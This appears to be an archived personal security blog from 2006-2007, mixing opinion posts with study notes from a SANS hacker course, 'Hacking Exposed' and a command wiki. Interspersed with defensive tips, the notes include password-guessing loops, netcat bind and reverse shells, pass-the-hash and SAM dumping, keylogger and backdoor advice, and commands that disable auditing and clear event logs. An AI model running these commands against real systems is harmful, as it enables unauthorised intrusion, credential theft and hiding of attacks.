Baseline a system after new software is added, check for new users/groups, new files/folders/registry entries, new priveleges granted, new acl's, and any security settings that may have been changed.

InCtrl5 and > secedit /generaterollback can be used, along with showaccs

SQL Profiler will show you what the SQL server sees coming from the webapp

OWASP application testing guides, more SQLsecurity

Don't trust home grown cypto, they often only use encoding like base64, XOR, or ROT13

17 - Data-Protection Mechanisms

Everyone group is identical to Authenticated Users. Do not modify default ACL's on XP or higher

Windows RMS

Protected Storage(Pstore) has been deprecated by Microsoft, as it is not secure, still used by many apps though

DPAPI is the replacement

The Value of Certifications

2007-05-17T21:44:00.001-04:00

After reading a very spirited, informative discussion on this topic over at SecurityFocus I decided to throw my own hat into the ring. I want to expand on several relevant topics. 1 - Certifications are a joke - A certification alone, without experience is typically not worth that much in the real world. It proves that the candidate can pass a test, often with having the questions in advance( see Testking/ActualTests). All it really guarantees, is that the candidate has some basic knowledge of the subject. Even the certs with experience requirements are pitiful, due to the fact that they do not audit every candidate. And if they did, there's always a chance they lied, like most people do on their resume. 2 - Certifcations are necessary - until the HR machine is overhauled, you cannot afford to not have certifications. Unless you have a good contact in the company, most non-certified individuals will be screened out by the non-technical HR employee, who basically knows keywords. I think also if your very specialized, like on a certain product or field, having one of the more advanced certs could be very rewarding financially. Also on the opposite spectrum, having certs in several different areas, like various OSes, networking, security, etc can show that your pretty versatile. 3 - Experience is still king - despite the fact that you have a lot of "enhanced" resumes out there, experience is still the most important factor in deciding whether or not a candidate will be successfull. A good track record of completing projects, troubleshooting, implementing, etc along with personal references from those jobs are still the best indicator that I've seen. Granted you need to do a fair amount of vetting via the technical interview, I still think its what employers should put more emphasis on versus certifications. In conclusion, I would like to state that I don't think its possibile for anyone to argue that the current certification system we have is not broke on multiple levels. We have hiring managers without a clue. We have money grubbing, so called experts selling us mediocre certifications. In short, we all have to take responsibility for fixing it. Whether its done by educating people of the dangers of paper only certified employees or by designing a new system, something needs to be done.

Lets download the entire Internet!

2007-04-26T21:43:00.001-04:00

As ridiculous as that sounds, startup Robot Genius aims to do just that. Talk about an ambitious project. Not only do they want to scour the entire internet, they also want to analyze the binaries present on the websites for malicious characteristics. Such a product is sure to be in high demand, given that web-based malware has taken the reigns from email-based malware as the vector of choice. This biggest gap I see, is how quickly they can do this. Its very common for malware authors to change IPs on a daily or weekly basis to stay ahead of the whitehats. With such a dynamic environment as the internet, surely they will not be able to keep uptodate with the daily changes. More realistically monthly changes would be feasible. Still, I see the value of the service as a more accurate blacklist then has been delivered in the past. I think this will serve to raise the bar for other AV/Security vendors to improve their products as well. And if that doesn't work, some behemoth like Symantec or Microsoft will just buy them out.

Read the Full Story HERE

MOMBY is on deck

2007-03-20T20:42:00.001-04:00

So I'm still undecided on whether or not Mondo Armando and Müstaschio are for real. All the news reporters seem to think so, but I think it could also be just another April fools joke. Either way, if they actually produce some Myspace exploits, that would be awesome. Myspace has such a history of slow response to security issues, that I'm not feeling sorry for them in any way. And given that it hosts millions of peoples personal information and they tend to be mostly computer illiterate and lack security knowledge, it looks like a good target for hackers. I also really like the approach these guys are taking, by making fun of the other Month of Whatever projects. HD Moore's original Month of Browser Bugs was awesome, but the ones that followed seemed to get less and less important. So in the end, I guess we will just have to wait and see whether this is just another publicity stunt or if these guys have something to offer other then humour. Stay tuned.

Read the Story HERE

Got Identities?

2007-03-19T20:38:00.001-04:00

Brian Krebs has written a few articles recently focusing on how bad identitiy theft and credit card fraud really is. There are 2 facts that I find really hard to ignore, which are also really infuriating. The first is that according to Symantec, the majority of the Credit Card trafficking is being done on servers located inside the USA. So what happened to that Patriot act? Why are these criminals allowed to continue doing this, when clearly the FBI has the power to stop it. I know the logic they are using is that they are going after the kingpins and not the small fish, which makes sense. Except that tens of thousands of US citizens are getting thier lives destroyed in the process. And even though they may take down a kingpin one day, another one pops up the next. So eitherway, US citizens are getting screwed. The second problem I have is that we are infact subsidizing our own credit cards getting stolen. The Credit Card industry on a whole acknowledges fraud as an acceptable loss and simple passes on the costs to the customer. They even go so far as to sell us identity theft protection. That is completely ridiculous. Here's a novel idea, how about you make your product secure before selling it to the American public.

Read the Story HERE

Old Wiki

2006-12-11T22:14:00.001-05:00

1 - Windows

- - Unable to delete registry key?
- Use the at command to schedule an interactive registry edit with SYSTEM rights
ex. c:\> at 16:00 /interactive regedt32.exe
- - Netstat Foo
- - C:\> netstat -na 1 | find "[Scan_Host_IP_Addr]" -- Watches for connections/scans
- - C:\> netstat -nao 1 | find "[Dest_IP_Addr]" -- Finds the PID generating the traffic
- - C:\> netstat -na 1 | find "4444" | find "ESTABLISHED" -- Reports when someone connects
- - Get Your Netbios Name Codes http://www.cotse.com/nbcodes.htm
- - PSTools Foo
- - Remote Shutdown > psexec \\RemotePC -u UserName -p Password shutdown -r -t 1
- - Remote Service Disabling - sc \\ config start= disabled
- - MISC
- - LM Empty Hash AAD3B435B51404EEAAD3B435B51404EE
- - NTLM Empty Hash 31D6CFE0D16AE931B73C59D7E0C089C0
- - Find Resultant Set of Group Policy, rsop.msc
- - C:\> write notepad.exe:STR -- allows you to see ADS
- - Ping Sweeper
- - for /L %i in (1,1,255) do @ping -n 1 .%i | find "Reply"
- - Auto NSlookup
- - for /L %i in (1,1,255) do @nslookup .%i 2>nul | find "Name" && @echo .%i
- - Password Guesser
- - for /f %i in (password.lst) do @echo %i & @net use \\[ip] %i /u:[Username] 2>nul && pause
- - or && echo UserName: %i >> success.txt
- - User and Password Guesser
- - for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & net use \\ %j /u:%i 2>nul && echo
- - %i:%j >> success.txt && net use \\ /del)

2 - *NIX

- Escaping wildcards in grep/egrep > grep ' 10\.0\.0\.1 ' or >egrep ' 10\.0\.0\.[0-9]+ '
- Finding Big Files for Deletion > find / -xdev -type f -size +1000k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }'
- Total unique lines and sort > grep whatever somefile | sort | uniq -c | sort -r
- WGETIE > alias wgetie='wget -U '\''Mozilla/4.0 (compatible); MSIE 6.0; Windows NT 5.1; SV1)'\'''
- Stop overwriting files
- in .bashrc> set -o noclobber
- set immutable bit> chattr +i

3 - Security

Quotes
Spafford's first principle of security administration. This principle states that 'if you have responsibility for security but have no authority to set rules or punish violators, your own role in the organization is to take the blame when something big goes wrong'.

"[S]ystem vulnerabilities do not result from immutable physical laws. They occur because of a gap between theory and practice. In theory, a system should do only what its designers and operators want it to. In practice, it does exactly what its code (and settings) tells it to" - Air Force

“Freedom, Security, Convenience: Choose Two” - Dan Geer

Didier Steven's Safe Website Analysis
1 - Make working directory "mkdir _

"
2 - cd into working directory
3 - echo "hxxp://something' > 01.url
4 - wgetie -d -o 02.log -i 01.url
5 - review log for 200 OK and data
6 - review file for malicious traits, rename to 03..html.vir if confirmed
7 - run "extractscripts.py 03..html.vir"
8 - rename to 04.script.1 and review file
9 - deobfuscate with spidermonkey "js 04.script.1"
10- rename output files
11- review logs for binaries or other downloads
12- download the binaries "wgetie -d -i 08.log -i 07.url"
13- review log for 200 OK and data, rename the file
14- pecheck.py 09..exe > 10..exe.pecheck
15- Check entropy for packing and other peinfo and a hash search possibly
4 - Browsers

- Firefox Hacks
- Render pages faster > nglayout.initialpaint.delay :int 0-50
- Reduce Reflows > content.notify.interval :int 500000<>1000000 & content.notify.ontimer :bool true
- Search Tool results in new tab > browser.search.openintab :bool true
- Increase http connections > network.http.max-connections :int 32
- Increase server connections > network.http.max-connections-per-server :int 16
- Increase persistent connections > network.http.max-persistent-connections-per-server :int 8
- Reduce interval for persistent connections > network.http.request.max-start-delay :int 0
- Activate pipelining > network.http.pipelining :bool true & network.http.pipelining.maxrequests :int 16
5 - Wireless

- WAP Security Tips

1. Update the firmware on the AP and on all of the STAs.

2. Change the administrators password to a very complex one that you can remember and or document.

3. If the AP allows you to do so, change the name of the administrators account.

4. Disable DHCP on the LAN side of the AP and use Static IP addressing on the STAs.

5. Change the default IP address of the AP to something that will work for your STAs.

6. Use the strongest authentication and encryption that the AP and STAs can all use.

7. Turn off the broadcasting of the SSID in the Beacon frame.

8. Use a non default SSID that neither identifies you, your business, your location, or the location of the AP.

9. Place a space or two at the end of the SSID. (War Drivers will not see them)

10. Implement a MAC filter allowing only your STAs to connect.

11. Turn the transmit power down on the AP to just what is required for desired coverage.

12. Use a non-overlapping channel, preferably not channel 6.

13. Change your PHY to 5GHz if possible.

14. Use Anti-Spyware on your STAs.

15. Use a personal firewall on the STAs.

16. Use end point protection software if possible.

17. Install the AP in a physically safe location.

18. Do not disclose your configurations to others.

19. Limit the number of allowed associations to just your STAs.

20. When not in use, turn off the AP.

21. If there is a breach in security, change all security settings as soon as possible.

22. If you are unable to configure the AP securely, consult a trained and certified professional to do so on your behalf.

6 - DNS

- DNS SecurityTips
- Restrict Zone Transfers. Only Secondary server should be allowed to transfer from Primary.
- Log all Zone Transfer requests
- Disable Recursion for external hosts, only exception would be roaming hosts and trusted partners.
- Restrict Queries
- Restrict dynamic updates, only authorized hosts should be able to make updates.
- Deploy Split DNS, logically and physically separate internal and external address space.
- TCP Port 53 is required for more then just zone transfers, don't block it on your secondary servers.
- Split-Split DNS setup seperates Resolving and Advertising functions. Requires 6 total DNS servers.
- SRV and _msdcs records contain internal Active Directory naming information
- Attacks -- DNS Rebinding "The Princeton Attack" - javascript (document.domain) and same-origin policy allow for domain name to be modified
-- DNS Pinning - sets DNS TTL very low and javascript forces another lookup with a bogus domain/ip pair. This allows for users to be forced to scan their internal network, which the attacker cannot access external due to IP restrictions.

Windows Memory Map

2006-03-06T22:13:00.000-05:00

Map of Windows Memory Addresses

openRCE

SANS - Hacker Track

2006-03-06T22:12:00.000-05:00

SANS Track 4 Notes, Comments

Day 1 – Incident Handling

Sample Incident forms are available @ http://www.sans.org/incidentforms/

Giac Practicals are available @ http://www.giac.org/GCIH.php

and contain good working examples

Protect Evidence – get the user away from the machine ASAP to keep the machine unchanged until you can image the drive. Keep the original stored in a safe place and maintain a chain of evidence.

Verify backup integrity to insure you are not restoring a compromised image.

Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned

Keep up to date on privacy laws, European laws are radically different from US laws

IDS, depending on the vendor, maybe able to monitor encrypted VPN traffic
Always strive to raise security awareness with management

Honeynet – for training purposes it maybe useful to set up a vulnerable system to intentionally let it be compromised to develop the teams investigative skills.

Nice Trojan Port list http://www.dark-e.com/archive/trojans/ports.shtml

http://www.glocksoft.com/trojan_port.htm

Organizations should create a list of most probable target systems to enhance monitoring efforts

Vulnerability/Exploit news www.netsys.com

Develop an Evidence Elimination IDS Signature, i.e. somebody accessing a website or tool that is designed to clean their system.

Legal/Regulatory sites http://www.groklaw.com http://www.findlaw.com

DOJ Electronic Evidence Guide http://www.cybercrime.gov/s&smanual2002.htm

Day 2 – Computer & Network Hacker Exploits

If viable get written permission for any activities not specifically authorized

http://www.counterhack.net/permission_memo.html
Software Disto Attacks – always verify Checksums across multiple sites

Inside Company Info – http://www.internalmemo.com

Robots.txt file contains information that companies don’t want you to see on the web. Instructs browsers not to look there. http://www.robotstxt.org

When crawling a website always used a cached version on Google if available

THC Wardialer @ http://www.thehackerschoice.com/releases.php

Every wireless encryption, including PEAP and LEAP, which rotate keys has been broken. There are many tools available for wireless sniffing and key cracking.

http://www.lava.net/~newsham/wlan/

The only true way to secure a WAP, would be to point it to a VPN with strong authentication.

Honeypot WAP’s are a good way to catch hackers in the act. Also, there are tools to broadcast fake SSID’s to confuse hackers.

In Unix, you need to use the iwconfig command to configure wireless cards. Requires installing wireless extensions.

Cheops isn’t accurate and routinely will miss 40% of network hosts

Port 80 and Port 443 are very popular for hackers to hide traffic in, because of the sheer volume of traffic make detection near impossible.

For passive “scanning” try P0F http://www.stearns.org

Firewalk will probe firewalls for open ports firewalk-0.99.1.tar.gz

Netscreen firewalls are considered one of the least statefull walls around, and allow SYN, FIN, and NO Flags to pass even if drop rules are in place.

Good idea to have a IDS Signature that will detect TTL tracerouting. Also, should block any ICMP error messages from leaving internal network.

90% of fragmented packets are estimated to be malicious. Some IPSEC VPN’s will create fragmented packets if not configured correctly. If feasible to business, consider dropping all fragmented packets at the firewall.

http://monkey.org/~dugsong/fragroute/

“Manager Think” – nothing bad has happened yet, so nothing probably will.

Day 3 – Computer & Network Hacker Exploits (continued)

It only takes 20-30 packets per minute to create a SYN Flood condition

If you’re on constantly seeing broadcast netbios traffic, it’s a good idea to verify domain or WINS configuration settings.

Sniffit has curses interface and will create inventory of sniffed connections and allow users to zoom in for more info on any particular traffic.

http://reptile.rug.ac.be/~coder/sniffit/sniffit.html

Dnsiff contains Tcpkill for RST DOS and Tcpnice, so slow down tcp connections. Slowing down the rate of traffic is a good way to limit a hacker without tipping him off you’ve detecting him.

Purdue website contains many useful tools ftp://ftp.cerias.purdue.edu/pub/tools/

TTYSnoop good tool for hijacking somebody else’s unix session. Linux RPM

DNS Cache Poisoning, Do we have dragon sigs for this?

To hide your source IP via Netcat relay, good idea to use a named pipe(> mknod backpipe p)

Large numbers of NOP packets maybe a buffer overflow attack(NOP Sled)

Memory Alignment makes code more efficient by aligning bytes into a certain memory location.

www.metasploit.com supposed to be a common framework for malware

Many buffer overflow defenses that monitor the stack have been beaten(Phrack 56)

Polymorphic exploits use XOR encryption to change the code’s appearance on the wire, see popular whitepaper on IDS Evasion techniques

http://www.knowngoods.org/ contains checksums to verify code

Good format strings paper http://muse.linuxmafia.org/lost+found/format-string-attacks.pdf

Intel Architecture stores numbers from right to left, so when feeding into the stack you need to feed backwards.

Day 4 – Computer & Network Hacker Exploits (continued)

Use Windows character map for easy Unicode Character conversions.

First MS fix for Unicode exploit can be beaten by double coding your directory transversal ..%252f..%252f..

Good idea to disable lanman hashes in the registry if backwards compatibility is not an issue

UNIX includes salt in there hashes to make them unique, where as password encrypted on a Windows system is the same on every windows system. Using a predefined list of encrypted passwords works well against windows

Check out extended modules for John like Crack S/Key and AFS/Kerberos
Once you have the admin password, use scheduler to get an interactive shell. If it’s not running use the net start command.

Check out pstools from www.sysinternals.com

Good idea to have different AV software on the desktop, mail server, and file servers. Allows for different virus definitions to be used at the various levels, instead of putting your eggs in one basket.

When harvesting web accounts pay close attention to the error messages, like invalid account versus invalid password or account locked. Once you have a valid account it can be brute forced.

Regarding Input Validation Attacks, to bypass any client side filtering save the page to disk and remove the java checks or just use Achilles. Server side filtering is the only true protection.

Check out Mixter’s paper on DDOS http://www.packetstormsecurity.com/distributed

DDOS method of choice is a reflected attack which bounces your botnet attack layer off high bandwidth sites (google, ebay, etc) to your target.

Day 5 – Computer & Network Hacker Exploits (continued)

In the future, we may see CPU level(microcode) malware

If IIS is not loaded on the C drive, try using a tool like tini because it will automatically find cmd.exe
Setiri Trojan can bypass all firewalls and proxies by running an invisible browser on the target machine to communicate with the attacker.

Several good tools exist to hide Trojans in normal executables (SaranWrap, Elitewrape, Silk Rope)

Installing a root kit may require the Kernel source code

Many Rootkits will self delete if a special signal is received, like a network cable being unplugged, see Lysine Deficiency

Webgoat software teaches you to hack websites

Buggybank from Webmaven includes real website flaws for you to investigate

Good best practices site http://www.cisecurity.org

Mount is an easy way to hide files. Simply create your file and mount another directory on top of it.

Time stamps can all be altered (touch,etc.), so they should not be trusted

StegFS will create a layered stego filesystem. Using multiple layers everything beyond the first layer will be undetectable.

Day 6 – Hacker Tools Workshop

Hack away …

Hacking Exposed Notes

2006-03-06T22:11:00.000-05:00

Hacking Exposed Notes

Footprinting – profiling an organization Internet, Intranet, Remote Access, and Extranet presence to determine security posture and netblocks

Website Pilfering – grabbing source code to analyze offline

Unix – Wget http://www.gnu.org/software/wget/wget.html

Win – Teleport Pro http://www.tenmax.com/teleport/home.htm

Search Engines – tools for searching multiple engines, IRC, email, etc at once

Win – FerretPRO($) http://www.ferretsoft.com

Web – DogPile http://www.dogpile.com

Registered Networks – internet whois searches

Current Registrars http://www.internic.net/alpha.html

Unix – Whois, Xwhois http://c64.org/~nr/xwhois/

Unix - $ whois “acme.”@whois.crsnic.net (list possible domains)

Unix - $ whois “HANDLE JS1234”@whois.networksolutions.com (list POC info)

Unix - $ whois “@acme.net”@whois.networksolutions.net (list email info)

Web – US http://www.arin.net

Web – International http://www.allwhois.com

Web – US Military http://whois.nic.mil

Web – US Gov http://whois.nic.gov

DNS Interogation – zone transfers between primary and secondary

Unix - $ nslookup

$ server x.x.x.x

$ set type=any

$ ls –d Acme.net. >> /tmp/zone_out

Unix - $ host –l –v –t any Acme.net

Unix - $ host Acme.net (resolves Mail Exchange records)

Unix – axfr http://ftp.cdit.edu.cn/pub/linux/www.trinux.org/src/netmap/axfr-0.5.2.tar.gz

Win – Sam Spade http://www.samspade.org

Network Reconnaissance – determine path to network(access path diagram)

Unix - $ traceroute –S –p53 x.x.x.x ( p option allows you to specify port to start at and will increment by one; S option will stop incrementing once open port is found)

Requires patch http://www.packetfactory.net/Projects/firewalk/traceroute.diff

Unix – traceroute option –I uses ICMP packets, default is UDP

Win – tracert(CLI)

Win – VisualRoute http://www.visualroute.com , NeoTrace http://www.neotrace.com (GUI)

Counter Measure – log incoming traceroutes and send back false data

RotoRouter http://packetstorm.securify.com/UNIX/loggers/rr-1.0.tgz

Scanning – determine systems that are alive and reachable via sweeps, port scans, and discovery tools

Ping Sweeps – sending out ICMP ECHO(type 8) across ranges

Unix – fping http://packetstorm.securify.com/Exploit_Code_Archive/fping.tar.gz

Unix – nmap, use –sP option and valid net range, -PT<#> allows you to try other ports if blocked

Unix – Hping http://www.kyuzz.org/antirez/ allows you to send fragmented packets(-f)

Unix – icmpenum http://www.nmrc.org/files/sunix/icmpenum-1.1.1.tgz ability to use ICMP TIME STAMP REQUESTS and ICMP INFO when ECHO is blocked, spoof packets with –s option, and passively list with the –p option

Win – Pinger http://www.nmrc.org/files/snt/

Win – Ping Sweep http://www.solarwinds.net

Additional Tools

Unix – Loki2 http://www.phrack.org/show.php?p=51&a=6 wraps data in ICMP packets, used to bypass firewalls and install backdoors

Port Scanning – connecting to TCP and UDP ports on a target system to see which services are running and which OS

TCP connect scan – full three way handshake, easily detected by host or NIDS

TCP SYN scan – no ACK is sent, only RST /ACK so that no connection is made, stealthier

TCP Xmas Tree Scan – uses FIN, URG, PUSH packets to receive RST for closed ports

TCP Null Scan – sends packet with no flags to receive RST for closed ports

TCP ACK Scan – used to map firewall rulesets, determine statefullness

TCP Windows Scan – analyzes TCP window size for OS identification and open ports

TCP RCP Scan – Unix, detect RPC ports and associated program

UDP Scan – looks for ICMP port unreachable, less accurate, slower

Unix – Strobe ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/strobe-1.06.tgz TCP scanner, also grabs banners

Unix – Saint(SATAN) http://www.saintcorporation.com/products/download.html UDP scanner

Unix - netcat http://www.saintcorporation.com/products/download.html Multifunction scanner

Unix – nmap, -D option for decoy scan, -I option shows owner of service(root), -b ftp bounce

Win – SuperScan http://www.foundstone.com/resources/proddesc/superscan4.htm

FTP Bounce Scanning - allows attacker put/get data via 3rd party server that is trusted by the target host. Requires port command and writable directory on system

http://www.securityfocus.com/archive/1/3488

Scan Detection

Unix – Snort http://www.snort.org/docs/ open source NIDS

Unix – scanlogd http://www.openwall.com/scanlogd/ host based logging

Unix – PortSentry http://sourceforge.net/projects/sentrytools/ host based, detects and blocks

Unix – alert.sh http://www.spitzner.net/intrusion.html firewall scan detection

Win – Genius 3.2.3 http://www.indiesoft.com/ windows host based scan detection

OS Determination – using techniques such as banner grabbing, port scanning, and stack fingerprinting to determine target hosts Operating System

Stack Fingerprinting – analyzing target machine’s TCP/IP stack for OS specific signatures. Each Vendor implements the TCP/IP stack slightly different.

http://www.insecure.org/nmap/nmap-fingerprinting-article.html

Passive Stack Fingerprinting – no connections are made, only analyzing packets via a sniffer for specific attributes such as TTL, Window Size, and DF(don’t fragment bit). The results can be compared to the Siphon fingerprint db http://www.l0t3k.org/security/tools/fingerprinting/

Discovery Tools

Unix – Cheops http://www.marko.net/cheops/ Linux GUI for network discovery via ping, traceroute, queso

Unix – Scotty http://wwwhome.cs.utwente.nl/~schoenw/scotty/ discovery tool, includes SNMP

Enumeration – process of extracting valid account and shared resource information for a target host

WINDOWS

Windows Resouce Kits – contains useful Windows utilities

Win2K - http://www.microsoft.com/windows2000/techinfo/reskit/tools/default.asp

- http://www.dynawell.com/support/ResKit/win2k.asp

WinNT - http://www.dynawell.com/support/ResKit/winnt.asp

Null Sessions – CIFS/SMB & NetBIOS all unauthenticated sessions via port 139 & 445

Win – C:>\net use \\192.168.202.33\IPC$ “” /u:”” (setting up a null session)

Win – edit registry key HKLM\SYSTEM\CurrentControlSet\Control\LSA\Restrict Anonymous

Must be set to 1 for NT and 2 for W2K to restrict null sessions. Read Hobbits CIFS paper for further info http://www.insecure.org/stf/cifs.txt

Domain Enumeration – use netbios on UDP port 137 to list domains and domain machines

Win – C:\>net view /domain

C:\>net view /domain: (lists machines on domain)

NetBIOS Name Tables – grab NetBIOS names remotely

Win – C:\>nbtstat –A 192.168.202.33

Win – C:\>nbtscan 192.168.234.0/24

Unix/Win versions found at http://www.inetcat.org/software/

Domain Controller Enumeration

Win – C:\>nltest /dclist: (ran over null session nltest /server:)

C:\>nltest /trusted_domains

Share Enumeration

Win – C:\>net view \\ (rmtshare, srvinfo [-s] also good NTRK)

Win – DumpSec also shows file system permissions and services http://www.somarsoft.com/

Win – Legion 2.1 http://www.elhacker.net/hacking.htm

Win – NAT ftp://ftp.technotronic.com/microsoft/nat10bin.zip

Misc Windows Enumeration Tools

Win – Epdump RPC service/port mappings http://packetstormsecurity.org/NT/audit/epdump.zip

Win – netviewx lists specific server types like domain controller, RAS, print

C:\>netviewx –D -T

http://www.ibt.ku.dk/jesper/NetViewX/default.htm

Win – Winfo automates null sessions http://www.ntsecurity.nu/toolbox/winfo/

Win – Nbtdump provides HTML report http://www.cerberus-infosec.co.uk/toolsn.shtml

SNMP Enumeration

Win – Snmputil – browses MIB(Management Information Base) tree using default strings like public, private. The tree is hierarchical, so each time you “walk up” more information is revealed. “.1.3.6.1.4.1.77.1.2.25” is the OID for Microsoft’s MIB.(NTRK)

C:\>snmputil walk 192.168.202.33 public .1.3.6.1.4.1.77.1.2.25

Win – IP Browser – Solarwinds GUI, http://www.solarwinds.net

More CIFS/SMB Enumeration

Win – Dumpsec(DumpACL) – uses null session to get user, group, share, and policy info

Win – sid2user/user2sid – allows for easy conversion of SID’s to usernames and vice versa

http://www.chem.mus.su:8080/~rudnyi/NT/sid.txt

C:\>user2sid \\ “domain users” (grabs the machines SID)

C:\>sid2user \\ 5 21 8915387 1645822062 18198280005 500 (grabs admin account’s user name, note 500 is always the admin RID, even if its renamed. Also, the first account created is always given an RID of 1000 and incremented by one from there)

Mark Russinovich http://www.win2000mag.com/Articles/Index.cfm?ArticleID=3143

Win – Enum – CLI utility for enumeration & password guessing http://razor.bindview.com

C:\>enum –U –d –P –L –c

Win – Nete from sirdystic of CDC, similar to enum

Win – UserInfo/UserDump user Level 3 call on NetUserGetInfo API http://www.HammerofGod.com/download.htm

LDAP Enumeration

Win – ldp.exe – Active Directory Administration Tool – connects to AD server and allows you to browse contents, runs on either port 389 or 3268(AD Global Catolog)

Banner Enumeration

Banner grabbing via telnet or netcat on various ports like 80, 21, 23, 25 will often leak system, OS, application, user, or version information. Also common to “nudge” the system into coughing up more information using commands like: GET / HTTP/1.0, HEAD, QUIT, HELP, ECHO, and sometimes just carriage returns.

Registry Enumeration

Regdmp(NTRK) or DumpSec(Somarsoft) can be both be used to do this, however by default Win2K Server usually doesn’t allow this. Review the Key HKLM\System\CurrentControlSet\Control\SecurePipeServer\Winreg\AllowedPaths

To see whats allowed

UNIX

NFS Enumeration

Unix – showmount – lists all NFS(port 2049) exported file systems on a machine

$showmount –e

NIS Enumeraton

Unix – in general various NIS client tools can be used to guess the NIS domain name of a server and retrieve NIS maps, which contain valuable information(pscan by Pluvius)

User & Group Enumeration

Unix – finger(port 79), rwho, rusers all list out who is on the machine at the time. To disable these services simply edit the inetd.conf file and killall –HUP inetd

Unix – SMTP – VRFY will confirm name of valid user; EXPN will give out the actual mail address of aliases and mailing lists. Just telnet to port 25 to test.

Unix – tftp – if enabled, may allow you to get the /etc/password file.

RPC Enumeration

Unix – rpcinfo, rpcdump – both list the RPC bindings for all applications running on the box. RPC uses ports 111, 32771. http://www.atstake.com/research/tools/info_gathering/

SNMP Enumeration

Unix – the net-snmp package will usually include both snmpget and snmpwalk

$ snmpget public system.sysName.0 (grabs host name)

$ snmpwalk public (grabs eniter MIB)

BGP Route Enumeration

Unix – ASN Queries – ASN(Autonomous System Numer) is a 16-bit integer purchased from ARIN to identify a company on the internet. Use http://www.completewhois.com/ to search for this info.

C:\> telnet route-views.Oregon-ix.net (public router)

Ø show ip bgp (last number in AS Path is ASN)

Ø show ip bgp regexp _$ (will give you the public IP space of company)

Windows NT Hacking – gaining access, escalating privileges and covering tracks on Windows NT system

Password Guessing

Default Passwords http://packetstormsecurity.org/docs/hack/dad.txt

http://phenoelit.darklab.org/cgi-bin/display.pl?SUBF=list&SORT=1

http://www.cirt.net/cgi-bin/passwd.pl

Null Passwords Tools NTInfoScan http://packetstormsecurity.org/NT/audit/index2.html

SMBGrind http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=SMBGrind&type=archives

Password Sniffing SMB Packet Capture(readsmb) included with l0phtcrack

PPTP – Unix based sniffer that captures VPN credentials(packetstorm)

Cain & Abel filters out login credentials http://www.oxid.it/

Pass The Hash NT Only, LSASS allows hash only authentication

http://www.core-sdi.com/papers/nt-cred.htm

Buffer Overflows unexpected input, which forces arbitrary code into the execution stack

http://www.cultdeadcow.com/cDc_files/cDc-351/page1.html by DilDog

http://pulhas.org/phrack/55/P55-15.html by Barnaby Jack

http://www.insecure.org/stf/smashstack.txt by Aleph One

Privilege Escalation

Hoovering process of stealing as much info off the machine as possible with a non-admin account. Srvinfo(NTRK) will enumerate shares and regdmp(NTRK) can probe the registry for info. Also good to script a find command in a batch file to look for the password string. GetAdmin uses DLL injection to add a user into the local admin group(crash4)
http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=9231

Sechole, Secholed escalates privileges of IUSR_machine_name account on IIS, must be able to upload to a executable directory on server http://www.winnetmag.com/Article/ArticleID/9269/9269.html

LPC Spoofing

hk(porttool) from Razor exploits the LPC Ports API, which has weak validation checks. Allows user to make a client thread as the SYSTEM user. http://www.bindview.com/Support/RAZOR/Utilities/Windows/LPCAdvisory.cfm

Password Cracking the SAM file may be obtained by booting to an alternate OS, from the repair directory, or extracting from the registry via tool.

Pwdump extracts password hashes from the SAM http://packetstormsecurity.org/Crackers/NT/pwdump3.zip

L0phtcrack defacto standard for cracking windows passwords, not free anymore LC5 http://www.atstake.com/products/lc/index.html

Cain & Abel - Poor man’s version of LC, free http://www.oxid.it/cain.html

Wordlists - http://coast.cs.purdue.edu/pub/dict/ http://www.cotse.com/tools/wordlists.htm

Exploiting Trusts

LSA Secrets - The key HKLM\SECURITY\Policy\Secrets holds service accounts in plain text, cached passwords of last 10 users, FTP and web plain test passwords, RAS usernames and passwords, and domain account information. Lsadump2 finds PID of LSASS and uses dll injection http://www.bindview.com/Support/RAZOR/Utilities/Windows/lsadump2_readme.cfm

Sniffers

WinDump, “w32 tcpdump” http://windump.polito.it/install/default.htm Ethereal http://www.ethereal.com/download.html
Dsniff for Win32 http://www.datanerds.net/~mike/dsniff.html

Keystroke Loggers - If sniffing fails, install a keystroke logger to obtain domain credentials http://www.download.com/3120-20-0.html?qt=Keystroke+logger&tg=dl-2001

Remote Control & Backdoors - Remote.exe From NTRK, gives remote users a CMD shell. Most popular way to start it on the host is the us the AT command(scheduler service).

SC.exe - Service Controler will start the scheduler service if its not running C:\> sc \\ start schedule
C:\> net time \\ (to check time on remote system)
C:\> at \\ 10:40P “”remote /s cmd secret”” (launchesserver) C:\> remote /c secret (launches your client)

Netcat -TCP-IP Swiss-Army Knife http://packetstormsecurity.org/UNIX/utilities/nc110.tgz
C:\> nc –L –d –e cmd.exe –p80 (starts listener on target host)
C:\> nc 80 (connects attacker to target host)

Netbus - similar to Back Orifice, the nbsvr.exe must be started on target first. Good idea to run in stealth mode by modifying the registry, however most Virus scans will detect it running. Default ports are 12345 and 20034
C:\> regini –m \\ regchange.txt (NTRK) http://packetstormsecurity.org/trojans/NB20Pro.exe

BO2K - Back Orifice, still under active development, works on 2K and XP http://www.bo2k.com/software/index.html

Along with these VNC, Netmeeting, and dameware are poplular gui-based remote control apps

Port Redirection
Netcat - “Shell Shoveling” target listens on one port while sending the output back via cmd shell to the attacker. The attacker must listen on 2 ports
$ nc 80 | cmd.exe | nc 25 (run on target)

Fpipe - Popular port redirector, also allows for specifying source port. Does have some session timeout issues though with TIME_WAIT and CLOSE_WAIT periods C:\>fpipe –v –l 53 –r 23 (command to run on target) http://www.foundstone.com/resources/proddesc/fpipe.htm

Root Kits - first Windows rootkit was from Greg Hoglund of rootkit.com. A root kit is a software suite that substitutes command system binaries with Trojans. Rootkits use a technique known as “function hooking” to redirect calls without altering the executable or binary. The current generation of Kernel level rootkits are very difficult to detect as they are embedded in the OS. http://www.antiserver.it/Backdoor-Rootkit/

Cover Tracks
Disable Auditing
C:\> auditpol /disable (NTRK)
Clear Event Log
C:\> elsave –s \\ -l “Security” -C http://www.ibt.ku.dk/jesper/NTtools/

Hiding Files
C:\> attib +h [directory] (dos command)
NTFS File Streaming will hide stuff as additional file attributes. It requires the POSIX utility cp(NTRK)
C:\> cp : (just reverse to unhide)

Windows 2000 Hacking – gaining access, escalating privileges and covering tracks on Windows 2K system

Footprinting
Resource Kit Tools http://www.microsoft.com/windows2000/techinfo/reskit/tools/default.asp
http://www.dynawell.com/support/ResKit/win2k.asp

